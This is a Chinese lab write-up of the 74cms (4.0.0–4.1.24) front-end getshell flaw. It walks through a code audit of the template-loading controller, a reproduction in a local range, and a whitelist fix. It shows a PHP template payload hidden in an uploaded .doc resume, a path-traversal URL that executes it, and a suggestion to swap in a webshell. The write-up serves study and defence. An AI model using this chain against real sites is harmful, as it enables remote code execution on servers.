一.概述
红日web靶场下载链接
1 | 链接:https://pan.baidu.com/s/12vaZancfB6xpeeGXqjRDXA 提取码:hzmy |
74cms存在前台getshell漏洞的版本号:4.0.0 - 4.1.24
该漏洞可以在Windows上实现,不能在Linux上实现
利用方式:注册一个账户后登录,在修改简历的界面上传一个doc的简历(doc文档里包含PHP代码),然后访问特殊构造的URL即可执行doc文件中的PHP代码。
由于靶场环境有一点小问题,我在74cms官网(http://www.74cms.com/download/index.html)下载了4.2.66版本,将/Application/Home/Controller/MController.class.php内容进行更改,主要就是把过滤的部分去掉。
更改后的MController.class.php
1 | class MController extends FrontendController{ |
二.代码审计
/Application/Home/Controller/MController.class.php
1 | class MController extends FrontendController{ |
1.index()方法的作用是根据URL中type参数的值来读取模板文件。
2.$type变量来自于URL,然后把$type传递给display()方法。display()方法是展示HTML模板。
3.当display()方法接收到一个文件路径时,它会判断这个文件是否存在,如果存在,则返回该路径,否则就会报错。
/ThinkPHP/Library/Think/View.class.php,下面就是parseTemplate()方法:
1 | public function parseTemplate($template='') { |
1、可以看到,parseTemplate()方法调用了is_file()函数判断模板文件是否存在。如果存在,即返回模板文件的路径;如果不存在则进行下一步操作。
2、parseTemplate()方法传递了display()方法的’M/’ . $type参数。$type参数又是可控的,所以这里可能会出现漏洞。
3、我们访问的url(&type=…/data/upload/word_resume/2112/08/61b07f2418704.doc)。当访问这个URL后,我们传递给parseTemplate()方法的参数就是:‘M/…/data/upload/word_resume/2112/08/61b07f2418704.doc’。在Windows上is_file()判断这个文件路径是存在的,而在Linux上不存在,所以该漏洞不能在Linux上实现。
4、上面的文件路径是相对于入口文件index.php的路径。
三.漏洞复现
1.下载源码,本地访问http://127.0.0.1/upload/install.php安装,安装完成后注册一个普通用户
2.进入个人中心,上传doc格式的简历,简历内容随便
3.使用burp抓包
4.修改包内容,内容要符合ThinkPHP模板格式
1 | <php>phpinfo();</php> |
5.成功回显文件上传路径,我的74cms根目录是upload
1 | /upload/data/upload/word_resume/2112/08/61b07f2418704.doc |
6.通过&type传参,成功执行命令。将内容换成一句话木马,可以直接getshell
1 | http://127.0.0.1/upload/index.php?m=home&c=m&a=index&org=1&type=../data/upload/word_resume/2112/08/61b07f2418704.doc |
四.防护
将/Application/Home/Controller/MController.class.php改为以下内容,4.1.24后的版本已经修复
1 | class MController extends FrontendController{ |
用in_array()函数判断$type参数是否是白名单中的值,如果不是则报错